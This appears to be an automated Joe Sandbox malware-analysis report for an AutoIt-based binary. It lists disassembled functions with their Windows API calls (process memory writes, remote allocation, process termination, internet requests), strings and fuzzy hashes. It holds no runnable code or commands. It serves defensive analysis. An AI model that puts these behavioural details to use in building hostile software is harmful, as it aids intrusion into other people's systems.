Instruction Fuzzy Hash: 1F119D71511609EFDF509FA4EC09FBE7B79EB46321F14802DE85597210CB3AAD40DB62

Function 0079B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0079B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0079B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0079B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0079B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0079B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0079B7FE

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 5cd80c1d24e22a3cda80eac0679d997bc78f83aea8f47271b2e0281bf66d02fa
Instruction ID: 8e0641fa84a196514facdb5bcf24aa35252fd59655d8521bfae645388f811524
Opcode Fuzzy Hash: 5cd80c1d24e22a3cda80eac0679d997bc78f83aea8f47271b2e0281bf66d02fa
Instruction Fuzzy Hash: 3C018475E00209BBEF109BE6AD49E5EBFB9EB48711F00807AFA04A7291D6349C00CF91

Function 00760162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00760193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0076019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007601A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 007601B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 007601B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 007601C1

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 5529f75d7a6b3cd75b4a604ba21a46c43238f385dd926afb38c93e4185e5e001
Instruction ID: 7c72e4cc83a71e60546b4ddd755dce747b71ac33224df5f9c8ceeb27f9176874
Opcode Fuzzy Hash: 5529f75d7a6b3cd75b4a604ba21a46c43238f385dd926afb38c93e4185e5e001
Instruction Fuzzy Hash: 440148B0901759BDE3008F5A8C85A52FFA8FF19354F00411BE15847941C7B5A864CBE5

Function 007A53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007A53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007A540F
GetWindowThreadProcessId.USER32(?,?), ref: 007A541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A543E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 16fea4d1bbfe8a5ab494583a21018baee700417d38f9f40824520c181d666208
Instruction ID: 4a51a9d0e253224dfe0c8fa8344c46f13bae25e15d31a7fe9c7a308b9235cf97
Opcode Fuzzy Hash: 16fea4d1bbfe8a5ab494583a21018baee700417d38f9f40824520c181d666208
Instruction Fuzzy Hash: 35F09032240558BBE3205BA2DC0DEEF7F7DEFCAB11F00416DFA04E1050D7A91A0186B9

Function 007A7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 007A7243
RtlEnterCriticalSection.NTDLL(?), ref: 007A7254
TerminateThread.KERNEL32(00000000,000001F6,?,00750EE4,?,?), ref: 007A7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00750EE4,?,?), ref: 007A726E

Part of subcall function 007A6C35: CloseHandle.KERNEL32(00000000,?,007A727B,?,00750EE4,?,?), ref: 007A6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 007A7281
RtlLeaveCriticalSection.NTDLL(?), ref: 007A7288

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 78e1abb270d4064ce1a86a5bcca936b07edb7167744caf2224b73753873c5d1e
Instruction ID: 7d2d334103b91b643be8a7a3d5ecc58a46ac7e7c3556bdd4b4109eb031f699b3
Opcode Fuzzy Hash: 78e1abb270d4064ce1a86a5bcca936b07edb7167744caf2224b73753873c5d1e
Instruction Fuzzy Hash: 7BF05E36540612EBE7151B64ED4CEDE773AFF45712B14463AF603910A0CB7E5801CB64

Function 007B85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007B8613
CharUpperBuffW.USER32(?,?), ref: 007B8722
VariantClear.OLEAUT32(?), ref: 007B889A

Part of subcall function 007A7562: VariantInit.OLEAUT32(00000000), ref: 007A75A2
Part of subcall function 007A7562: VariantCopy.OLEAUT32(00000000,?), ref: 007A75AB
Part of subcall function 007A7562: VariantClear.OLEAUT32(00000000), ref: 007A75B7

Strings

AUTOIT.ERROR, xrefs: 007B8728
Incorrect Parameter format, xrefs: 007B864B, 007B880D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 1b45ae2e9681d4d5b5b470a1573c6b447c7e4829b52dded363e60c74a6203465
Instruction ID: 17f981f602b28351c71bb0cb9adba4511b09ee600e9b54e9578387cc5c45ed23
Opcode Fuzzy Hash: 1b45ae2e9681d4d5b5b470a1573c6b447c7e4829b52dded363e60c74a6203465
Instruction Fuzzy Hash: D3918071604301DFC750DF24C484A9BBBE8EF89714F14896EF95A8B362DB35E905CB52

Function 007A2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0075FC86: _wcscpy.LIBCMT ref: 0075FCA9

_memset.LIBCMT ref: 007A2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007A2C97

Strings

0, xrefs: 007A2B73

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: aff941dcbda2b1cda830e0c5b239d9cdf0c4198add3cf5fb7a9312cb1f98f392
Instruction ID: 3e4bc7fb5443944d659a72564284150165fddfcfd502ed943b939bebcc9c603e
Opcode Fuzzy Hash: aff941dcbda2b1cda830e0c5b239d9cdf0c4198add3cf5fb7a9312cb1f98f392
Instruction Fuzzy Hash: 20519F716083009BD7649F2CD845A6F77E5EB86320F044B2DF895D71A2DB78CD068BA2

Function 00753137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00753277
_memmove.LIBCMT ref: 00753310
_free.LIBCMT ref: 00753336
_memmove.LIBCMT ref: 007533E9

Strings

_u, xrefs: 00753322
3cu, xrefs: 00753225

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cu$_u
API String ID: 2620147621-3001241828
Opcode ID: 9ee89d82beb22c7cb42d4e9dac7bdb4d83bbebaca8bfdbb0ad14ac6f51b61e0a
Instruction ID: 01fda6e082967212747ecd196d389dfde14be06daa151a8cad2caec5d6a178cf
Opcode Fuzzy Hash: 9ee89d82beb22c7cb42d4e9dac7bdb4d83bbebaca8bfdbb0ad14ac6f51b61e0a
Instruction Fuzzy Hash: E3517B716047819FDB25CF28C480BAFBBE5BF85350F04492DE98987361EB79E905CB82

Function 007C97F4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0127F3B0,?), ref: 007C9863
ScreenToClient.USER32(00000002,00000002), ref: 007C9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007C9903

Strings

@U=u, xrefs: 007C995E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: 8ec93adbeb08c0651db730c31e3689f552e6cd4b7f3e5ad8df9ae7bf272323c1
Instruction ID: 6dc199401460913a7b211338f6777a96e65b8b25a1711f6fd3f01b5157f8e975
Opcode Fuzzy Hash: 8ec93adbeb08c0651db730c31e3689f552e6cd4b7f3e5ad8df9ae7bf272323c1
Instruction Fuzzy Hash: 05511A34A00609EFDF50CF64C888EAE7BE6FB95360F14816DF9559B2A0D734AD81CB90

Function 007997F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00799296,?,?,00000034,00000800,?,00000034), ref: 007A14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0079983F

Part of subcall function 007A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007A14B1

Part of subcall function 007A13DE: GetWindowThreadProcessId.USER32(?,?), ref: 007A1409
Part of subcall function 007A13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0079925A,00000034,?,?,00001004,00000000,00000000), ref: 007A1419
Part of subcall function 007A13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0079925A,00000034,?,?,00001004,00000000,00000000), ref: 007A142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007998AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007998F9

Strings

@U=u, xrefs: 0079983F, 007998AC, 007998F9
@, xrefs: 00799911

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @$@U=u
API String ID: 4150878124-826235744
Opcode ID: af8ab025d0e10300dfb96a47c2cdd30dce3acb31fbde47347e0a0c53cfc849ba
Instruction ID: a0e063312e1396f1db838659e99fc68f097a07d23554772ff6cea3e7bc730c7e
Opcode Fuzzy Hash: af8ab025d0e10300dfb96a47c2cdd30dce3acb31fbde47347e0a0c53cfc849ba
Instruction Fuzzy Hash: 96415E7690121CAFDF10DFA8CC85EDEBBB8EB49300F004199FA45B7181DA746E45CBA0

Function 0079D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0079D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0079D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0079D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0079D69D

Strings

DllGetClassObject, xrefs: 0079D610

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 0101b90d193a299cacd27227ea92ff697515b38ca48c5475f6943d92901535e2
Instruction ID: 5bdc9d35e19a5decc228a47569f650512c4f56267cc49e36e7eb78094c4db92b
Opcode Fuzzy Hash: 0101b90d193a299cacd27227ea92ff697515b38ca48c5475f6943d92901535e2
Instruction Fuzzy Hash: 4C41B1B1600204EFDF25CF64D884A9ABBB9EF44350F1580ADED099F206D7B9DD40CBA0

Function 007A2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007A27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 007A2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00805890,00000000), ref: 007A286B

Strings

0, xrefs: 007A27B5

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: dd51d65c91ff69548aa7319cf60c9f764e2faa49cd77f0d91a0222115e00a2e5
Instruction ID: 48b1d5b21902f4c2e721453ac9bb102a03d5c9a5d7210b44569d8ae67cace6a7
Opcode Fuzzy Hash: dd51d65c91ff69548aa7319cf60c9f764e2faa49cd77f0d91a0222115e00a2e5
Instruction Fuzzy Hash: 3641B1702043019FD724DF28C844F1ABBE4EFC6314F144A2DF9A597292D738E906CB62

Function 007C8851 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007C88DE

Strings

@U=u, xrefs: 007C892D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 86b572f9ddd1d540715ac846548ea3188965f99c8a17297d1e5749652cbed37f
Instruction ID: 73f0f19c40efd7c11c6045122d929b5af47a499fc13131fa6322f1a818746117
Opcode Fuzzy Hash: 86b572f9ddd1d540715ac846548ea3188965f99c8a17297d1e5749652cbed37f
Instruction Fuzzy Hash: CE31B234610108EFEBA09A58CC49FB977A5FB09310F94412EFA15E76A1CF78E9809B57

Function 007BD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007BD7C5

Part of subcall function 0074784B: _memmove.LIBCMT ref: 00747899

Strings

none, xrefs: 007BD8A0
cdecl, xrefs: 007BD81C
stdcall, xrefs: 007BD847
winapi, xrefs: 007BD836

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 321104b8b224be472da1c2a936e31dbc7f985949fd4b32d0919fcdde0da918b7
Instruction ID: 272aa823e5c890c3aa3b3f4c000ac9c38ab2d7b535a4d719ad4739786dd441b3
Opcode Fuzzy Hash: 321104b8b224be472da1c2a936e31dbc7f985949fd4b32d0919fcdde0da918b7
Instruction Fuzzy Hash: 1F31C171904619EBCF14EF94C845AFEB3B5FF00320B008629E865973D1EB39AD05CB80

Function 007B182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007B18A2
InternetCloseHandle.WININET(00000000), ref: 007B18E9

Part of subcall function 007B2483: GetLastError.KERNEL32(?,?,007B1817,00000000,00000000,00000001), ref: 007B2498
Part of subcall function 007B2483: SetEvent.KERNEL32(?,?,007B1817,00000000,00000000,00000001), ref: 007B24AD

Strings

, xrefs: 007B1893

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: d92d110f98e2faab4e132cae855e35cac1776e7734bddb602c31eeed00fa2694
Instruction ID: d8b210effa097517add10bc216f890fe76de1fa0b7cbe3b00a335a4dc9753dc1
Opcode Fuzzy Hash: d92d110f98e2faab4e132cae855e35cac1776e7734bddb602c31eeed00fa2694
Instruction Fuzzy Hash: A4217FB1500208BFEB119B649C99FFB77ADFB48754F90412EF805E6140DA289E0597A5

Function 007C63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C6461
LoadLibraryW.KERNEL32(?), ref: 007C6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C647D
DestroyWindow.USER32(?), ref: 007C6485

Strings

SysAnimate32, xrefs: 007C643C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
